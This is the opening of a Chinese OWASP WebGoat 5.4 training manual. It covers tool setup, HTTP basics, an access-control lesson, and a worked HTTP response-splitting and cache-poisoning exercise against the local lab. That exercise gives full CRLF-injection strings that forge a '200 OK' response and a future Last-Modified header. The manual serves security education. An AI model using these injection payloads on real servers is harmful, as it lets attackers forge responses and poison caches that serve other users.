

# WebGoat 中文手册

# 版本:5.4

webgoat 团队

2013年1月



# Revision record 修订记录

项目任务	参与人员	完成时间
项目人员协调	Rip,袁明坤, lvy	2012年7月
翻译及整核以往版本	袁明坤,傅奎,beer,南国利剑,lion	2012 年 8 月
Webgoat5.4 版本测试	袁明坤,傅奎,beer,南国利剑,lion	2012 年 8 月
Webgoat5.4 中文手册	傅奎	2012 年 9 月
审核发布	阿保, 王颉, 王侯宝	2013年1月
前期参与人员	蒋根伟,宋飞,蒋增,贺新朋,吴明,akast,杨天识,Snake,孟祥坤,tony,范俊,胡晓斌, 袁明坤	

[感谢所有关注并参与过 OWASP 项目的成员,感谢你们的分享和付出,webgoat 和大家一 起成长!如有修改建议,请发送至 webgoat@owasp.org.cn 我们一起改进,谢谢! 2/177



# 目录

1	Web	oGoat í	简介	6
	1.1	亻	十么是 WebGoat	6
	1.2	亻	十么是 OWASP	6
	1.3	V	VebGoat 部署	6
	1.4	F	用到的工具	7
		1.4.1	WebScarab	7
		1.4.2	Firebug 和 IEwatch	8
	1.5	1	其他说明	8
2	Web	oGoat	教程	9
	2.1	2	宗合(General)	9
		2.1.1	HTTP 基础知识(Http Basics)	9
		2.1.2	HTTP 拆分(HTTP Splitting)	11
	2.2	ţ	方问控制缺陷(Access Control Flaws)	19
		2.2.1	使用访问控制模型(Using an Access Control Matrix)	19
		2.2.2	绕过基于路径的访问控制方案(Bypass a Path Based Access Control Sche	me)
				22
		2.2.3	基于角色的访问控制(LAB: Role Based Access Control)	25
		2.2.4	远程管理访问(Remote Admin Access)	36
	2.3	A	.jax 安全(Ajax Security)	38
		2.3.1	同源策略保护(Same Origin Policy Protection)	38
		2.3.2	基于 DOM 的跨站点访问(LAB: DOM-Based cross-site scripting)	39
		2.3.3	小实验:客户端过滤(LAB: Client Side Filtering)	43
		2.3.4	DOM 注入(DOM Injection)	46
		2.3.5	XML 注入(XML Injection)	49
		2.3.6	JSON 注入(JSON Injection)	52
		2.3.7	静默交易攻击(Silent Transactions Attacks)	54
		2.3.8	危险指令使用(Dangerous Use of Eval)	57
		2.3.9	不安全的客户端存储(Insecure Client Storage)	59
	2.4	ì	人证缺陷(Authentication Flaws)	62
		2.4.1	密码强度(Password Strength)	62
		2.4.2	忘记密码(Forgot Password)	64
		2.4.3	基本认证(Basic Authentication)	66
		2.4.4	多级登录 1(Multi Level Login 1)	71
		2.4.5	多级登录 2(Multi Level Login 2)	73
	2.5	2	爰冲区溢出(Buffer Overflows)	74
		2.5.1	Off-by-One 缓冲区溢出(Off-by-One Overflows)	74
	2.6	ſ	代码质量(Code Quality)	78
		2.6.1	在 HTML 中找线索(Discover Clues in the HTML)	78
	2.7	ŧ	并发(Concurrency)	79
		2.7.1	线程安全问题(Thread Safety Problems)	79
		2.7.2	购物车并发缺陷(Shopping Cart Concurrency Flaw)	80
	2.8		夸站脚本攻击(Cross-Site Scripting (XSS))	82

OWASP 中国 The Open: Web Application Security Project

http://www.owasp.org.cn

2.8.1 使用 XSS 钓鱼(Phishing with XSS)	82
2.8.2 小实验:跨站脚本攻击(LAB: Cross Site Scripting)	84
2.8.3 存储型 XSS 攻击(Stored XSS Attacks)	90
2.8.4 跨站请求伪造(Cross Site Request Forgery (CSRF))	91
2.8.5 绕过 CSRF 确认( CSRF Prompt By-Pass)	93
2.8.6 绕过 CSRF Token(CSRF Token By-Pass)	98
2.8.7 HTTPOnly 测试(HTTPOnly Test)	.102
2.8.8 跨站跟踪攻击(Cross Site Tracing (XST) Attacks)	.103
2.9 不当的错误处理(Improper Error Handling)	.105
2.9.1 打开认证失败方案(Fail Open Authentication Scheme)	.105
2.10 注入缺陷(Injection Flaws)	.107
2.10.1 命令注入(Command Injection)	.107
2.10.2 数字型 SQL 注入(Numeric SQL Injection)	.109
2.10.3 日志欺骗(Log Spoofing)	.110
2.10.4 XPATH 型注入(XPATH Injection)	.112
2.10.5 字符串型注入(String SQL Injection)	.113
2.10.6 小实验: SQL 注入(LAB: SQL Injection)	.115
2.10.7 通过 SQL 注入修改数据(Modify Data with SQL Injection)	.119
2.10.8 通过 SQL 注入添加数据(Add Data with SQL Injection)	.120
2.10.9 数据库后门(Database Backdoors)	.121
2.10.10 数字型盲注入(Blind Numeric SQL Injection)	.123
2.10.11 字符串型盲注入(Blind String SQL Injection)	.124
2.11 拒绝服务(Denial of Service)	.126
2.11.1 多个登录引起的拒绝服务(Denial of Service from Multiple Logins)	.126
2.12 不安全的通信(Insecure Communication)	.127
2.12.1 不安全的登录(Insecure Login)	.127
2.13 不安全的配置(Insecure Configuration)	.130
2.13.1 强制浏览(How to Exploit Forced Browsing)	.130
2.14 不安全的存储(Insecure Storage)	.131
2.14.1 强制浏览(How to Exploit Forced Browsing)	.131
2.15 恶意执行(Malicious Execution)	.132
2.15.1 恶意文件执行(Malicious File Execution)	.132
2.16 参数篡改(Parameter Tampering)	.134
2.16.1 绕过 HTML 字段限制(Bypass HTML Field Restrictions)	.134
2.16.2 利用隐藏字段(Exploit Hidden Fields)	.136
2.16.3 利用未检查的 E-mail(Exploit Unchecked Email)	.138
2.16.4 绕过客户端 JavaScript 校验(Bypass Client Side JavaScript Validation)	.142
2.17 会话管理缺陷(Session Management Flaws)	.148
2.17.1 会话劫持(Hijack a Session)	.148
2.17.2 认证 Cookie 欺骗(Spoof an Authentication Cookie)	.154
2.17.3 会话固定(Session Fixation)	.158
2.18 Web 服务(Web Services)	.162
2.18.1 创建 SOAP 请求(Create a SOAP Request)	.162
2.18.2 WSDL 扫描(WSDL Scanning)	.168



The Open web Addication Security Meloci	http://www.owasp.org.cn
2.18.3 Web Service SAX 注入(Web Service SAX Injectior	ı)170
2.18.4 Web Service SQL 注入(Web Service SQL Injectior	172
2.19 管理功能(Admin Functions)	
2.19.1 报告卡(Report Card)	
2.20 挑战(Challenge)	
2.20.1 挑战(The CHALLENGE!)	



# 1 WebGoat 简介

## 1.1 什么是 WebGoat

WebGoat 是 OWASP 组织研制出的用于进行 web 漏洞实验的应用平台,用来说明 web 应用中存在的安全漏洞。WebGoat 运行在带有 java 虚拟机的平台之上,当前提供的训练课 程有 30 多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话 cookie、SQL 盲注、数字型 SQL 注入、字符串型 SQL 注入、web 服务、Open Authentication 失效、危险的 HTML 注释等等。WebGoat 提供了一系列 web 安全学习的教程, 某些课程也给出了视频演示,指导用户利用这些漏洞进行攻击。

## 1.2 什么是 OWASP

OWASP 是一个开放式 Web 应用程序安全项目(OWASP, Open Web Application Security Project)组织,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖的软件。开放式 Web 应用程序安全项目(OWASP)是一个非营利组织,不附属于任何企业或财团。因此,由 OWASP 提供和开发的

(OWASP) 是一个非官利组织,不附属于任何企业或财团。因此,田 OWASP 提供和开发的所有设施和文件都不受商业因素的影响。

美国联邦贸易委员会(FTC)强烈建议所有企业需遵循 OWASP 所发布的《十大 Web 弱点防护》守则。

OWASP 官方地址: <u>http://www.owasp.org</u> OWASP 中文官方: <u>http://www.owasp.org.cn</u>

## 1.3 WebGoat 部署

WebGoat 可以在网上下载到,运行其中的"webgoat\_8080.bat"即可。在运行前,需要将代理设置为 localhost,端口 8080。

在浏览器中输入 http://localhost:8080/WebGoat/attack 登录,如果启动了 WebScarab,则在浏览器输入 http://localhost.:8080/WebGoat/attack。初始用户名密码是 guest。

可以在\WebGoat-5.2\tomcat\conf\tomcat-users.xml 文件中修改用户名与密码。

也可以在\WebGoat-5.2\tomcat\conf\server\_80.xml 文件中修改端口号。

注意:具体文件路径可能因 WebGoat 版本不同而有所区别。



## 1.4 用到的工具

#### 1.4.1 WebScarab

#### 1.4.1.1 介绍

WebScarab 是一个用来分析由浏览器提交到服务器请求,以及服务器对浏览器做出的响应的应用服务框架,也可以当做一个代理工具,或者说就是一个代理。使用者可以利用 WebScarab 查看、分析、修改、创建所截取的浏览器与服务器之间的请求与响应,也可以用 来分析 HTTP 与 HTTPS 协议。

网页的对话输入框中可能存在某些限制,比如长度,格式等等。现在使用者可以在 WebScarab 截获请求对话框中对其进行修改;还可以利用 WebScarab 对网站进行注入型攻击, 以测试网站的安全性。

WebScarab 也是 WebGoat 的一个辅助工具,在 WebGoat 进行某些漏洞攻击时,可以利用 WebScarab 分析,修改所提交的请求,以及返回的响应。

#### 1.4.1.2 安装与配置

1. 安装和运行的前提是 JRE 环境的支持,如果双击. jar 文件不能运行,可以右击选择打开程序为 Java 安装路径下的 jre(C:\ProgramFiles\Java\jre1.6.0\_02\bin)。

2. 安装: 双击 webscarab-installer-20070504-1631. jar 文件, 按照安装向导进行相应的安装。

3. 运行: 安装完成后可以通过桌面快捷方式或者安装目录下的 webscarab. jar 文件进行运行,运行后如下图:



WebScarab Lite		
Eile ⊻iew Iools	s <u>H</u> elp	
Summary Inte	ercept	
Intercept request	ts : 🔲 Case Sensitive Regular Expressions ? 🗌	
Methods	Include Paths matching :	
GET		
POST	Exclude paths matching :	
HEAD	[ *L(gif)[(pg)](css)[(js)](ico)\$	
PUT		
DELETE		
TRACE		
PROPFIND		
OPTIONS		
Intercent respon	- 292	
Only MIME Typos	matching ·	
Conty withing - Types	maching.	
POTA		
	Used 1 04 of 63 56MR	
	USER 1.34 01 03,30000	

4. WebScarab 的安装比较简单,但是需要 JRE 环境。WebScarab 配置,主要是浏览器 网络链接的设置。

5. 测试: 勾选 WebScarab 的拦截选项, 打开一个页面时 WebScarab 可以截获到请求, 说明配置正确。

## 1.4.2 Firebug 和 IEwatch

Firebug 是 Firefox 下的一个插件,能够调试所有网站语言,如 HTML, CSS 等,但 FireBug 最吸引人的就是 JavaScript 调试功能,使用起来非常方便,而且在各种浏览器下都能使用 (IE, Firefox, Opera, Safari)。除此之外,还有其他强大的功能,比如 HTML, CSS, DOM 的 察看与调试,网站整体分析等等。总之,就是一套完整而强大的 WEB 开发工具。再有就是 其为开源的软件。

IEWatch 是一个微软 IE 的内置插件,可以查看和分析 HTTP/HTTPS 头信息, cookies 以及通过 GET 和 POST 提交的数据。

## 1.5 其他说明

由于 WebGoat 项目(包括中文)本身为 OWASP 多名成员共同参与完成,因此可能出现 部分截图中 IP 或主机名不一致的情况。建议使用时结合您的安装环境的具体情况做必要的 调整。



# 2 WebGoat 教程

## 2.1 综合(General)

## 2.1.1 HTTP 基础知识(Http Basics)

### 2.1.1.1 技术概念或主题(Concept / Topic To Teach)

该课目的在于了解浏览器和 Web 应用程序之间数据交互的基本知识。

#### 2.1.1.2 技术原理(How It works)

HTTP 是如何工作的呢?所有的 HTTP 传输都要遵循同样的通用格式(需要使用 IEWatch 或 WebScarab 类插件协助进行学习)。每个客户端的请求和服务端的响应都有三个部分:请求或响应行、一个报头部分和实体部分。客户端以如下方式启动一个交互:客户端连接服务器并发送一个文件请求。

GET /index.html?param=value HTTP/1.0

接下来,客户端发送可选头信息,告知接收服务器其配置和文件格式。

User-Agent: Mozilla/4.06 Accept: image/gif, image/jpeg, \*/\*

发送请求和报头之后,客户端可以发送更多的数据。该数据主要用于使用 POST 方法的 CGI 程序。

### 2.1.1.3 总体目标(General Goals)

请在页面下方的输入域中输入字符串,点击【Go!】按钮后提交数据。服务器接收请求 后会返回用户的输入,并回显给用户。该过程展现了 HTTP 请求的基本操作原理

用户应通过以下操作熟悉 WebGoat 的特征,如:通过操作页面上方的按钮可以查看提示信息、HTTP 请求参数、HTTP 请求 Cookies 以及 Java 源代码。您也可以在首次使用时尝试使用工具 WebScarab。



## 2.1.1.4 操作方法(Solutions)

在浏览器设置中增加一个 localhost 的代理,然后可以启动 WebScarab。

🛞 直 连接设置				
<b>配置访问因特网的代理</b> <ul> <li>○ 无代理(Y)</li> <li>○ 自动检测此网络的<sup>4</sup></li> <li>○ 使用系统代理设置(</li> <li>● 手动配置代理: (M)</li> </ul>	! 代理设置( <u>W</u> ) (U) )			
HTTP 代理: (X)	localhost	端口: (P)	8008	-
	□ 为所有协议使用相	目同代理(S)		
<b>SSL</b> 代理:		端口: ( <u>o</u> )	0	
ETP 代理:		端口:(R)	0	
SO <u>C</u> KS 主机:			0	
	○ SOCKS v4 ● SO	CKS <u>v</u> 5		
不使用代理: (№)	localhost, 127.0.0.	1		
〇 自动代理配置 URL	例如: .mozilla.org, : ( <u>A</u> )	.net.nz, 192.168.1	.0/24	
			重新载入([	E)
帮助(出)		取消	确定	

我们需要在"拦截(Intercept)"选项卡中选择"拦截请求(intercept request)"。

le View ]	Tools Help	
Summary	Intercept	
ntercept rec	uests : 🗹	Case Sensitive Regular Expressions ?
Methods		Include Paths matching :
GET		
POST		Exclude paths matching :
DELETE DELETE TRACE PROPFIND OPTIONS		
intercept res	sponses : [	
inly MIME-Ty	pes matchin	91
1.176 B		

在页面输入框中填写上您的名字("Your Name")后,单击【Go!】按钮提交数据。在 WebScarab 的新窗口中,我们可以找到参数"person"。



Parsed	Raw					
Method	URL					Version
POST	http://17	2.16.115.132:8	0/WebGoat/attack?	Screen=16&menu=100		HTTP/1.
Header	Valu	le				Insert
lost Isor-Agon	1/2.16	5				- Delete
v Tel Agen	it prozina,	9000   				
URLEDO	oded	Toxt Hox				
	100 C 100	Text Hex				
		Variable			/alue	
person		Variable		Your Name	/alue	
person SUBMIT		Variable		Your Name Go!	/alue	Insert
person SUBMIT		Variable		Your Name Go!	/alue	Insert
person SUBMIT		Variable		Your Name Go!	/alue	Insert Delete
person SUBMIT		Variable		Your Name Gol	/alue	Insert Delete
oerson SUBMIT		Variable		Your Name Go!	/alue	Insert Delete
person SUBMIT		Variable		Your Name Go!	/alue	Insert Delete
person SUBMIT Parsed	Raw	Variable		Your Name Go!	/alue	Insert Delete
person SUBMIT Parsed Version	Raw	Variable Variable		Your Name Go!	/alue	Insert Delete
person SUBMIT Parsed Version	Raw	Variable Variable		Your Name Go!	/alue	Insert Delete
Person SUBMIT Parsed Version	Raw Status	Variable Variable		Your Name Go!	/alue	Insert Delete
person SUBMIT Parsed Version Header	Raw Status	Message		Your Name Go!	/alue	Insert Delete
Person SUBMIT Parsed Version Header	Raw Status	Variable Variable Message		Your Name Go!	/alue	Insert Delete
Person SUBMIT Parsed Version Header	Raw Status Valu	Variable Variable		Your Name Go!	/alue	Insert Delete

该操作完成后,系统提示课程完成。

## 2.1.2 HTTP 拆分(HTTP Splitting)

#### 2.1.2.1 技术概念或主题

该课目的在于介绍如何进行 HTTP 拆分攻击。

#### 2.1.2.2 技术原理

攻击者在向 Web 服务器正常输入的请求中加入恶意代码,受到攻击的应用不会检查 CR (回车,也可表示为%0d 或\r)和 LF (换行,也可表示为%0a 或\n)。这些字符不仅使攻击者控制应用程序打算发送的响应头和响应体,而且还使他们能够完全在其控制下创造更多的答复。

HTTP 拆分攻击配合缓存污染一起使用,能使效果达到最大化。缓存污染攻击的目标是 使缓存污染,欺骗缓存,使其相信使用 HTTP 拆分劫持的页面是一个很正常的页面,是一个 服务器的副本。攻击发生时,使用 HTTP 拆分攻击,加上最后修改添加的部分:请求头,并 设置它为将来的日期。这将迫使浏览器发送 If - Modified- Since 请求头,这使攻击者有机会 拦截服务器的答复,并代之以一个"304 不修改"答复。以下是一个简单的 304 响应:



HTTP/1.1 304 Not Modified Date: Fri, 30 Dec 2005 17:32:47 GMT

#### 2.1.2.3 总体目标

本课程分为两个步骤。步骤一将帮助您学习如何实施 HTTP 拆分攻击;步骤二在步骤一的基础上将帮助您学习如何提升 HTTP 拆分攻击技术以用于缓存污染攻击。

首先,在输入框中填写任何语言名称并提交搜索,您会发现浏览器被重定向到服务端另外一个资源。您需要利用 CR (%0d) 与 LF (%0a)等特殊字符串进行攻击,目标是强制服务端返回一个 HTTP 200 OK 的数据包。如果攻击奏效页面发生变化,请回到首页。在步骤二成功完成之后,您会在左侧菜单栏看到醒目的绿色图标——过关标志。

您会发现 <u>PHP Charset Encoder</u>非常有用。其中 Encode 和 Decode URI 模块的可以实现对 CR 和 LF 等字符的转换。

#### 2.1.2.4 操作方法

请注意,以下操作过程仅适用于 Windows 环境。如果您正在使用 Linux,请作相关的修改。Windows 系统中同时使用 CR 和 LF 两个字符表示新行。Linux 用户只需要使用 LF, Mac OS 用户请使用 CR。所以如果您正在使用 Linux 系统,请将以下操作过程中所有的%0d%0a 需要 替换成%0a(Linux)或%0d(Mac OS)

由于输入内容未作验证您可以插入任何 HTTP 语法,回车和换行符。

随便输入一个语言名称提交看看数据都是怎么交互的。请确认 WebScarab 的请求拦截 和返回拦截功能已经启用。

Ĉ	Constant * statistics ************************************	Enter a language for the system to search by: This issues has too stages. Stage 1 feaches you how to do HTTS Spleting attacks while stage Substage for the system to search by: You will not be decision in the search of the system to search will be an effect to you will not the search to be used to C. Wile source thanged as an effect to you will not the green check in the left substage to HTTP Spanner. Search by country 1 (eff. Search) Created by Sherf Kouses in Sector 2000	
	Traecure Configuration Nanogement Web Services AIAX Security Challenge	DWASP Poundation   Propert Weblinet	

语言框输入"en",并提交数据。



第一次 HTTP 响应

OWASP 中国 The Open Web Application Security Project



Edit Re	quest	
		Intercept requests : 😥 Intercept responses : 🗹
Parsed	Raw	
En Integran construction deferming the construction deferming the construction construction of the construction response of the cons	eevaluu gelgir, i puimeod origing oding: g Mogila Mogila occache ESSION	eb00a949fack/95/creene1016/menu=508/formRedirects/ye88/anguagesen HTTP/1.1 mageh:xbfmap, image/pipeg, application/schockwave-flash, application/ind ms-excel, application/ind ms-powerpoint, application/insword, *f* veb0oa948fack/95/brows/NedHint&menu=50 +De 12.5%/C08239fc30= 25/b, deflate (A 0 (compatible, MSIE 7.0, Windows NT 5.1; NET CLR 1.1.4322; NET CLR 2.0.50727; InfoPath 2) Gep-Alive ID=9167E3A0F598D9C2A4623078A39E69224
-		Accent changes Cancel changes Abort regisert Cancel All intercents
		recent condition contracted to contracted

第二次 HTTP 请求。

可以看到第二次 HTTP 请求的数据来自第一次 HTTP 响应中的 Location 部分。而 Location 中的数据来自于第一次 HTTP 请求。

接下来重新开始,在第一次 HTTP 数据提交前篡改 HTTP 请求数据包。

首先在 language 字段注入非法数据: en%0d%0a%0d%0a%0d%0a。注意: Linux 和 Mac OS 系统请参考前面的章节做适当的修改。

🏦 Edit Re	equest						
			1	Intercept requests :	Intercept response	es: 🗹	
Parsed	Raw						
POST http: Accept.imm Referer. th Accept-Lat Content-Ty UA-CPU.x Accept-Ent User-Agen Proxy-Cont Content-ley Host neo Pragma: n Cookie: JS Authorizati Ianguages	Jineo 8 ageight tp:/ineoo nguage ype: app (88 coding: c	WebGoattlessons/G imagek-xbitmap, ima WebGoattatk:/Stre ni-be ilication/stwe-form-u gzip, deflate al-0 (compatible, MSI Keep-Alive 3 NID=9167E3A6F58BD Ic 23VIC3G623VIC3G= 0d%250a%250d%250	neral/redirect.jsp?Scree e/ipeg, image/ipipeg, ap ner-101&menu=50&from lencoded E 7.0, Windows NT 5.1; J 9C2A4623079A39E8224 Ia%250d%250a8SUBMC	n=101&menu=50 HTT Dicationty-shockwave- Redirect=yes&languag	PYI.1 lash, application/vnd m e=en	s-excel, application/ind ms-power Path 2)	point, application/msword, "(*
			Accent changes	Cancel channes	Abort reminet	Cancel ALL intercents	

第一次 HTTP 请求



第一次 HTTP 响应。

OWASP 中国 The Open Web Application Security Project

注入特殊字符后,HTTP 响应数据包中"Content-Length: 0"告诉浏览器响应已经结束。 200 OK 等字符串消息看起来很像"HTTP/1.1 200 OK"。 利用以上特征,接下来您可以尝试使用如下字符串:

foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a

Foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 47

<html>Hacked J</html>



g can kequest					
	Intercept requests	s: 🗹 Intercept respons	ies : 🛄		
Parsed Raw					
HTTP/1.1 ave-flash, application/vnd ms-ekc guage=restart	I, application/md ms-powerpoint, application/ms	word, */*			
i; NET CLR 2.0.50727; IntoPath.2					
i250aHTTP%2F1.1%2520200%2	5200K%250d%250aContent-Type%3A%2520text	%2Fhtm1%250d%250aCc	ontent-Length%3A%252047%25	0d%250a%250d%250a%3Chtm	(%3EHa(
	1	1			•
*					

HTTP 拆分攻击

		Intercept requests : 📝 Intercept responses : 🗹	
Parsed	Raw		
POST http:// Accept.ima Referer.http Accept-Lan Content-Typ UA-CPU.v8 Accept-Enc User-Agen/ Prox-Cont	ineo 80 age/gif, i guage: pe: appl 96 oding: g t Mozilia nection	OWebOostlessons/General/redirect.jsp?Screen=101&menu=50 HTTP/1.1 imageh-xbitmap, image/peg, image/ppg, application/r-shockwave-flash, application/md ms-excel, application/md ms-powerpoint, application/msword, */* webOoat/attack?Screen=101&menu=50&fromRedirect=yes&language=restart in-be lication/r-www-form-unlencoded gdp, deflate a/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET CLR 1.1.4322; NET CLR 2.0.50727; InfoPath 2) 	
			1.
Parsed	Raw		
Content-ler Date: Thu, 1	ngth: 0 12 Jul 2	20071455:11 GMT.	
Content-ler Date: Thu, X-RevealHi	ngth: 0 12 Jul 2 idden: p	2007 14 55.11 GMT possibly modified	
Content-ler Date: Thu, X: RevealHi	ngth: 0 12 Jul 2 diden: p	20071455.11 OMT possibly modified	

HTTP 响应



dit Request	×
Intercept requests : 🗹 Intercept responses : 🗹	
rsed Raw	
htg.ineo 80Meelõostatakr?Greene 1018menu=508fromRedirect+yes8ianguage=robair%03%04Conterk-Length %209%04/04%04%04Mot#NoeHTTP/1 1%20200%200K%04%0 pt imagelgi (magels-bitmap, imageljpeg, imagels)peg, applicationk-shockware-flad, applicationhimd ms-excel, applicationhimd ms-powerpoint, applicationhimsword, ** er: htg.imacMeelõostatakr?Greene 1018menu=508fromRedirect+yes8ianguage=restat pt_Language: ni-be orzation: Basic ZSMc306Z3Vic30e :PU-v88 V4Encoding gdb, deflate rAgent Mozillar4 0 (compatble; MSIE 7.0, Windows NT 5.1; NET CLR 1.1.4222; NET CLR 2.0.50727; InfoPath 2) +Contention: Ksep-Alvie Leo mit in-c-ache ke: JSESSIONID=9167E3A6F598DD9C2A4623079A39E8224	Der
Accept changes Cancel changes Abort request Cancel ALL intercepts	
第二次 HTTP 请求	

Intercept requests :  Intercept request :  Intercept reque	🚮 Edit Re	sponse						(	
Parsed Raw ars004%03-Content-Length: %2008.0d%03-%0d%03-HTTP/1.1%20200%200K%0d%03-Content-Type: %20tex0html%0d%03-Content-Length: %2047%0d%03-w0d%03-chtml+Hacked%2 at 20.50727; IntoPath_2)    Parsed Raw HTTP/1.1200 CK Server: Apathe-Coyolef1 Server: Apathe-Sorver: Server: Serve				1	Intercept requests :	Intercept response	ses : 🗹		
ai Sod Sta Content-Length: % 200 % 0 d % 0 a % 0 d % 0 a % 0 d % 0 a % 1 min - Hacked % 2 pint ador/wind mis-excel, application/wind mis-powerpoint, application/misword, "" at 2.0.50727; IntePath.2) Parsed Raw HTTP:/1.1200 OK Server: Apathe-Corpoter 1 Pragma: No-cathe Explose Thu, 01 Jan 1970 01:00:00 CET Content-Vere athfold X-Transfer-Encoding: churked Date: Thu, 12 Jan 2007 14.5559 OMT X-Transfer-Encoding: churked Date: Thu, 12 Jan 2007 14.5559 OMT X-Transfer-Encoding: churked Content-Vere athfold Content-Vere athfold X-Transfer-Encoding: churked Content-Vere athfold X-Transfer-Encoding: churked Content-Vere athfold X-Transfer-Encoding: churked Content-Vere athfold X-Transfer-Encoding: churked Content-Vere athfold X-Transfer-Encoding: churked X-Transfer-Encoding: churked X-Tr	Parsed	Raw	2						
Parsed Row Parsed Row HTTP:/1.2000K Server.Apache-Coryote/1.1 Pragma: No-cathe Cache-Control noc-cathe Explines: Thu, 01 Jan 1970.01:00:00 ¢ET Content-Type: tradfmdl X-Transfer-Encoding chunked Date: Thu, 12 Jul 2007 14;55:59 OMT X-RevealHidden: possibly modified Content-length: 13 <html: hisked<="" th=""><th>ar%0d%0a pplication/ art 2.0 50727</th><th>Content nd.ms-e ; InfoPat</th><th>Length %200%0d%0a xcel, application/vnd m 1.2)</th><th>%00%0aHTTP/1.1%20; s-powerpoint, applicatio</th><th>200%20OK%0d%0aC Minsword, 7*</th><th>ontent-Type %20texbht</th><th>ml%0d%0aContent-Length%2</th><th>047%0d%0a%0d%0a~html+Hac</th><th>ked%2 •</th></html:>	ar%0d%0a pplication/ art 2.0 50727	Content nd.ms-e ; InfoPat	Length %200%0d%0a xcel, application/vnd m 1.2)	%00%0aHTTP/1.1%20; s-powerpoint, applicatio	200%20OK%0d%0aC Minsword, 7*	ontent-Type %20texbht	ml%0d%0aContent-Length%2	047%0d%0a%0d%0a~html+Hac	ked%2 •
Parsed Raw  HTTP/1 1200 OK Server: Apache-Coryote/1.1 Pragma: No-cache Cache-Control no-cache Explines: Thu, 01 Jan 1970 01:00:00 CET Content-Type: tradfmdi X-Transfer-Encoding: chunked Date: Thu, 12 Jul 2007 14:55:59 OMT X-Revaelilididitis: possibly modified Content-liength: 13 <https: <="" actional.com="" th="" www.inite.org=""><th>•</th><th></th><th></th><th></th><th></th><th></th><th>¥</th><th></th><th></th></https:>	•						¥		
Parset       Raw         HTTP1:1:200.0K       Serve: Apache-Coptots1.1         Pragma: No-cache       Cache-Control: no-cache         Explores: Thu, 01 Jan 1970.01:00:00 CET       Content-Type: textRhml         X-Transfer-Encoding: churked       Date: Thu, 12.Jul 2007.14.55.59.0MT         X-RevealHidds: possibly modified       Content-Head Head         Content-Head				9 <sup>1</sup>					1100
Accept changes Cancel changes Abort request Cancel ALL intercepts	Cache-Coi Expires: Tr Content-Ty X-Transfer Date: Thu, X-RevealH Content-le <html+had< th=""><td>ntrol: no- u, 01 Ja pe text? Encodin 12 Jul 2i idden: p ngth: 13 ked</td><td>cache n 1970 01:00:00 CET fml g: chunked 007 14,55 59 0MT sssibly modified</td><td>Accept changes</td><td>Cancel changes</td><td>Abort request</td><td>Cancel ALL infercepts</td><td></td><td></td></html+had<>	ntrol: no- u, 01 Ja pe text? Encodin 12 Jul 2i idden: p ngth: 13 ked	cache n 1970 01:00:00 CET fml g: chunked 007 14,55 59 0MT sssibly modified	Accept changes	Cancel changes	Abort request	Cancel ALL infercepts		

第二次 HTTP 响应





步骤一完成。

现在您已经知道如何进行 HTTP 拆分攻击了。您可以使用这个技术发起一次缓存污染攻击。

缓存污染要求篡改 HTTP 头中的 Last-Modified 字段。必须将字段修改为当前时间以后的 某个时间,如: 2039 年 6 月 4 日。

再次修改 HTTP 数据包,插入如下代码并提交:

foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202060%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked J</html>

Fooba	
Content-Length: 0	





HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT Content-Length: 47

<html>Hacked J</html>



OK,看到以上提示说明您已经过关了。

# 2.2 访问控制缺陷(Access Control Flaws)

## 2.2.1 使用访问控制模型(Using an Access Control Matrix)

## 2.2.1.1 技术概念或主题(Concept / Topic To Teach)

在一个基于角色的访问控制方案中,角色代表了一组访问权限和特权。一个用户可以被 分配一个或多个角色。一个基于角色的访问控制方案通常有两个部分组成:角色权限管理和 角色分配。一个被破坏的基于角色的访问控制方案可能允许用户执行不允许他/她的被分配 的角色,或以某种方式允许特权升级到未经授权的角色的访问。



#### 2.2.1.2 技术原理(How It works)

无。

### 2.2.1.3 总体目标(General Goals)

每个用户都是角色的成员,每个角色只允许访问那些特定的资源。您的目标是浏览本站 管理所使用的访问控制规则。只有"Admin"组才能够访问"帐号管理"资源。

### 2.2.1.4 操作方法(Solutions)

先选择一个用户,再选择一个资源,然后点击【Check Access】,出现页面如下图所示:

St. Kingsteiner Les	Show Params	Show Cookies	Lesson Plan	Show Java	Solution
Solution ¥ide	205			Rest	art this Lesson
In a role-base privileges. A u normally consi role-based acc allowed by his, role.	d access contro iser can be assi ists of two parts cess control sch /her assigned r	l scheme, a role r gned one or more :: role permission eme might allow a oles, or somehow	epresents a set o roles. A role-bas management and a user to perform allow privilege e	of access perr sed access co d role assignr accesses tha scalation to a	nissions and ntrol scheme nent. A broken it are not n unauthorized
General Goal	l(s):				
Each user is a to explore the access to the '	member of a n access control Account Manag	ole that is allowed rules that govern er' resource.	to access only c this site. Only the	ertain resourc e [Admin] gro	es. Your goal is up should have
* User Moe [	Public] was a	llowed to access	s resource Publ	lic Share	
Change u	iser:	Moe	•		
Select re:	source:	Public	Share 💌	1	
		Check	Access		

持用户不变,即 Change user 选项仍是 Moe,在 Select resource 选项中选中下一个资源 Card Entry,然后仍然是点击【Check Access】,出现页面如下所示:



Solution Videos

**Restart this Lesson** 

In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role.

#### General Goal(s):

Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource.

#### \* User Moe [Public] did not have privilege to access resource Time Card Entry



此时红色字体提示的意思是:公用用户 Moe 不具有对资源 Time Card Entry 的访问权限。 依照上述方法直到检测到如下提示时:

-A	a.	77 7 1000	Using	g an Acces	ss Contr	ol Matrix
- Hi	nts 🕨	- Show Params	Show Cookies	Lesson Plan	Show Java	Solution

Solution Videos

Restart this Lesson

